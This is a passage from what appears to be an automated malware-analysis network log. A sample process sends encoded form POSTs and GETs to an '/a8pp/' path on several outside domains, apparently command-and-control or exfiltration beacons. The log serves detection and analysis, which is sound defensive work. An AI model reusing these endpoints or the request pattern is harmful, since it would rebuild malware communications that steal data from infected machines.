                                        Data Ascii: 2NlhHLS8=Mt643xzJw6Im/VZFbS7zDlISiVFqfXkkxqdUH/CPfKt31ODirR1q1Wy8zdfu9j/sVcleyOapmtvqtPGNolan2wOIIsud6wSxTyUEvi3fyxSDJLjgliChUyfyCAzwi0e8vDqwqjTBEnQbatZv70a9WLJ0HKBPLb9t5wMZ3d2fpC4hmKh5LmiG/sJre2jDlo36vFQXirId6ydFMWKbUFDuQ9Y=
                                        Jun 4, 2024 14:38:58.581917048 CEST | 812 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:38:58 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rdVjSQqYhmHZoSDcL62rKDPjeokpTQrN4vpyWslW61cTHPAL88Qj0KcpvVBE7wxPzLq8v%2FqkuZnE9SDqW7C9SJC1Jd7udz%2BUTWgErmxDBXrGv9c%2FE3vOS11z6AaciU4nJyINpMRHc%2ByYM9JW"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7fba6e840748f-MIA
                                        alt-svc: h3=":443"; ma=86400
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:38:58.581938982 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        68 | 192.168.11.30 | 49862 | 172.67.205.56 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:00.977001905 CEST | 1697 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Origin: http://www.barrettdigitalart.com
                                        Referer: http://www.barrettdigitalart.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8= [TRUNCATED]
                                        Jun 4, 2024 14:39:01.189018011 CEST | 818 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:39:01 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O2Af226UEr%2Brce51AE1m1JR1%2BJOeHRa6jFa2%2FLarEr2jkKzpRNvAmtmtNOJfy6%2FIZleQqtBz2n2rjvXc2RI6cKjRBko4Ki0P97R59p7NSpdglCmf75wR9iNVjyRC8am%2BxQHS%2B2X5FZCy%2FQY6"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7fbb7890a495a-MIA
                                        alt-svc: h3=":443"; ma=86400
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:39:01.189029932 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        69 | 192.168.11.30 | 49863 | 172.67.205.56 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:03.630337954 CEST | 475 | OUT | GET /a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:39:03.812156916 CEST | 962 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:39:03 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0pNF9IloBKBX3yKeUlnJbbk7w7ghwlMtdlxJbnkBi9zyKBjVL64Lmmxvn0tA6lMOjbouGxrRh3WU%2F%2BZxcH98fueMJN2fN%2Fep5%2BnhYyxWTOjagOWbRFiJTCxWEtegbpIB%2Bux%2F%2BwBlhLASbFIG"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7fbc81b0db0a9-ATL
                                        alt-svc: h3=":443"; ma=86400
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:39:03.812179089 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        70 | 192.168.11.30 | 49864 | 162.0.237.22 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:08.995440960 CEST | 745 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Origin: http://www.astralavenue.xyz
                                        Referer: http://www.astralavenue.xyz/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=NsRClavgw11fhn+E9LhffIz5TlELfaR0hVLo0+GYTrImPpVCerDGp+VxaiB+8GenUvUjis9Su4pfMkCMtMn2DN1tHi/7FT/5JjMAHIvunc/Se5CYPXLARJM8e6+/cqdhfVpnjbC5Yh791gRE8/DxQNUelKkrGFACAbN1fGmU9m7q5Ve2eHUCjZQ8NItORuUd+w==
                                        Jun 4, 2024 14:39:09.173477888 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:39:09 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        71 | 192.168.11.30 | 49865 | 162.0.237.22 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:11.709048986 CEST | 765 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Origin: http://www.astralavenue.xyz
                                        Referer: http://www.astralavenue.xyz/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=NsRClavgw11fhGuE7YJfWIz+dFELIKR4hVPo08qITd4mBrdCfqDGq+VxSCB/4GesUvQdiu5Su49fMmKMt/P1Cd1jSy/DBT/5JjMAHIrXncXSeKqYOzeWbpNOWa+/YqdlfVowjafeYjz91kdE8qvwZNUiqqlCBlhsEYJXWWGkzjHt1ivsDEgAw5sRRJAmTsVGj/yMDOpN1alP+0pUE+xWu68=
                                        Jun 4, 2024 14:39:11.910677910 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:39:11 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        72 | 192.168.11.30 | 49866 | 162.0.237.22 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:14.417556047 CEST | 1682 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Origin: http://www.astralavenue.xyz
                                        Referer: http://www.astralavenue.xyz/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8= [TRUNCATED]
                                        Jun 4, 2024 14:39:14.609250069 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:39:14 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        73 | 192.168.11.30 | 49867 | 162.0.237.22 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:17.115878105 CEST | 470 | OUT | GET /a8pp/?2NlhHLS8=Au5imsmV21JYiQqAtZZYW5jQMTc/TsZAtUnDsMKbX4YoEplVSL6Rm/9dTWFSyViTXIIw8p1ls4ghLUagt/HJKO94HieJHgrJIyAOML3UnsK6ear2OzXGe/M=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:39:17.297362089 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:39:17 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        74 | 192.168.11.30 | 49868 | 64.190.62.22 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:22.530529022 CEST | 751 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Origin: http://www.nurse-job2535.life
                                        Referer: http://www.nurse-job2535.life/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=UW4VQ8guDJ7h1+Zuuq7X95+eBYoq3z/RvieTOC95oK4YLhWpKdOrWw2LLMHQZlG7EF6GX303CEeu50+/RTG5lxOSK8ZsLOuZoWGNilBCmE1Qwj/gQQb7UwGgHq9Cql/YwwWrRCaUS9W23TKvTQm+TCB8C4CEjeqUP2Irtxqt5hcSsxzQW3F6bKP/1seKDOV/yA==
                                        Jun 4, 2024 14:39:22.755132914 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                        date: Tue, 04 Jun 2024 12:39:22 GMT
                                        content-type: text/html
                                        content-length: 556
                                        server: NginX
                                        connection: close
                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        75 | 192.168.11.30 | 49869 | 64.190.62.22 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:25.280807018 CEST | 771 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Origin: http://www.nurse-job2535.life
                                        Referer: http://www.nurse-job2535.life/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=UW4VQ8guDJ7h1dBuhr7XsJ+dL4oqhD/VvjiTOD40o4sYLBmpNY6rVw2LfcHVE1GwEFGwX343CEau52W/Rge+0xOQSMZqEuuZoWGNilVkmEtQwSPgfVn4XwGjXa9ChF/UwwWCRH7zS/u23W2vUBmxZCB+OoD2r/KQJHBdqA201wUmtmCKL0x4IqzSptziBMUkvHbf6GmKSrX7jnL3fJKk9bE=
                                        Jun 4, 2024 14:39:25.506483078 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                        date: Tue, 04 Jun 2024 12:39:25 GMT
                                        content-type: text/html
                                        content-length: 556
                                        server: NginX
                                        connection: close
                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        76 | 192.168.11.30 | 49870 | 64.190.62.22 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:28.028928995 CEST | 1688 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Origin: http://www.nurse-job2535.life
                                        Referer: http://www.nurse-job2535.life/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8= [TRUNCATED]
                                        Jun 4, 2024 14:39:28.253918886 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                        date: Tue, 04 Jun 2024 12:39:28 GMT
                                        content-type: text/html
                                        content-length: 556
                                        server: NginX
                                        connection: close
                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        77 | 192.168.11.30 | 49871 | 64.190.62.22 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:30.783164978 CEST | 472 | OUT | GET /a8pp/?2NlhHLS8=ZUQ1TL0seNvx54VLi4j8goKVXeEHsH3HvniJXC80qaRkGy2/Bav7bR6THbfzZ3GDEHeASBxbKXGg0EinUgac1wLiet4LPvLUzSGHrF52u0MP0A2xTBnpXUY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:39:31.012324095 CEST | 107 | IN | HTTP/1.1 436
                                        date: Tue, 04 Jun 2024 12:39:30 GMT
                                        content-length: 0
                                        server: NginX
                                        connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        78 | 192.168.11.30 | 49872 | 23.227.38.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:36.139025927 CEST | 748 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Origin: http://www.shootprecious.com
                                        Referer: http://www.shootprecious.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=UoIxDAENV6IVynwnYhWf5XKCVKG5q6ZzfuKyBxLWF7FcaXDC1IVcJHLWf7UFhl60DD4yp4LvIiNKQiAttiPyisigq+OZnNWqE9+RoHv9qrTVcf0RT/eFgVEHcUgojqo9T6eDI6aXLmHYTcGaCiSODtCwy6C297vhQpAawWIZ6/QDhwO+DHiPhES/GNjNKHSV9Q==
                                        Jun 4, 2024 14:39:36.340501070 CEST | 1289 | IN | HTTP/1.1 402 Payment Required
                                        Date: Tue, 04 Jun 2024 12:39:36 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        x-frame-options: DENY
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        x-request-id: eea0610b-6f4a-4632-9ea9-1469db8dac61-1717504776
                                        server-timing: processing;dur=10
                                        content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=eea0610b-6f4a-4632-9ea9-1469db8dac61-1717504776
                                        x-content-type-options: nosniff
                                        x-download-options: noopen
                                        x-permitted-cross-domain-policies: none
                                        x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=eea0610b-6f4a-4632-9ea9-1469db8dac61-1717504776
                                        x-dc: gcp-us-east1,gcp-us-central1,gcp-us-central1
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WEXjsE4gHwpRMveKTEdY7vyiyosKQEI5%2B1LEu9OEqjRLCFpL0OGR0V2i5cVNy7A7oKLq%2BpRBb0ZogYabsPCfHBuRf4PHEUe0stVVfmzmqK2KtNLRHEyleyn%2FuvteBTW
                                        Jun 4, 2024 14:39:36.340539932 CEST | 256 | IN
                                        Data Ascii: QeLselfqEg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=82.999945Server: cloudflareCF-RAY: 88e7fc934aa3135d-ATLalt-svc: h3=":443";
                                        Jun 4, 2024 14:39:36.340603113 CEST | 1289 | IN
                                        Data Ascii: 95f<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Something went wrong.</title> <meta name="referrer" content="never" /> <style type="text/css"> * { border:0; margin:0; padding:0; -moz-box-sizing:border-
                                        Data Ascii: 2491 94.0547368,133.549132 88.4000619,141.832528 C82.8877709,149.908075 73.2619412,154.924302 63.2801517,154.924302 C61.1654118,154.924302 59.0628762,154.696755 57.0308545,154.247774 C55.1859659,153.840226 53.4271858,153.633736 51.8040093,153.
                                        Jun 4, 2024 14:39:36.347081900 CEST1289INData Raw: 38 30 2e 31 33 30 39 34 37 34 2c 31 34 35 2e 37 37 33 35 30 39 20 38 38 2e 38 38 36 32 30 31 32 2c 31 32 35 2e 39 31 33 30 35 37 20 38 34 2e 38 37 39 31 31 31 35 2c 31 31 33 2e 35 31 38 38 36 38 20 43 38 32 2e 38 37 38 39 35 36 37 2c 31 30 37 2e
                                        Data Ascii: 80.1309474,145.773509 88.8862012,125.913057 84.8791115,113.518868 C82.8789567,107.330943 79.7465108,105.699396 76.9978235,105.699396 C73.9284334,105.699396 71.3377245,107.735094 71.3377245,107.735094 C69.1972198,112.892604 67.525904,114.60634


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        79 | 192.168.11.30 | 49873 | 23.227.38.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:38.779052973 CEST | 768 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Origin: http://www.shootprecious.com
                                        Referer: http://www.shootprecious.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=UoIxDAENV6IVzHgnVgWf43KBL6G5jaYbfu2yBzmOEOdca3TC6sJcOHLWVbUAsF6/DD0Lp43vIiZKQjwtuV7xj8iiyOOH69WqE9+RoHLXqv/VcvERTaiGs1EAKkgow6o5T6e9I7GtLkvYTdaaBzSNItCyvqDE4YKFJq87+2kh1cIwpH/keEWNykuSaMOlIFTOgbutOkQ07x5m4okquOYWHa4=
                                        Jun 4, 2024 14:39:39.016335964 CEST | 1289 | IN | HTTP/1.1 402 Payment Required
                                        Date: Tue, 04 Jun 2024 12:39:38 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        x-frame-options: DENY
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        x-request-id: c2b32b18-fc27-44ec-8bd4-ecd246ad4c70-1717504778
                                        server-timing: processing;dur=45
                                        content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=c2b32b18-fc27-44ec-8bd4-ecd246ad4c70-1717504778
                                        x-content-type-options: nosniff
                                        x-download-options: noopen
                                        x-permitted-cross-domain-policies: none
                                        x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=c2b32b18-fc27-44ec-8bd4-ecd246ad4c70-1717504778
                                        x-dc: gcp-us-east1,gcp-us-central1,gcp-us-central1
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SpXzYt42aEinuaEf4SulD%2BqrCgJ7LnWQODKN64BVAdRujIFrWZgMZQ2YBBUwG2RaaIAlHDyKeefoU6YcYs6ucRmPKuLjvVG4qjtzDb3NPTffVvpE0BmJt3ROmyBdsjCcyOi


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        80 | 192.168.11.30 | 49874 | 23.227.38.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:39:41.418387890 CEST | 1685 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Origin: http://www.shootprecious.com
                                        Referer: http://www.shootprecious.com/a8pp/
                                        Content-Length: 1141
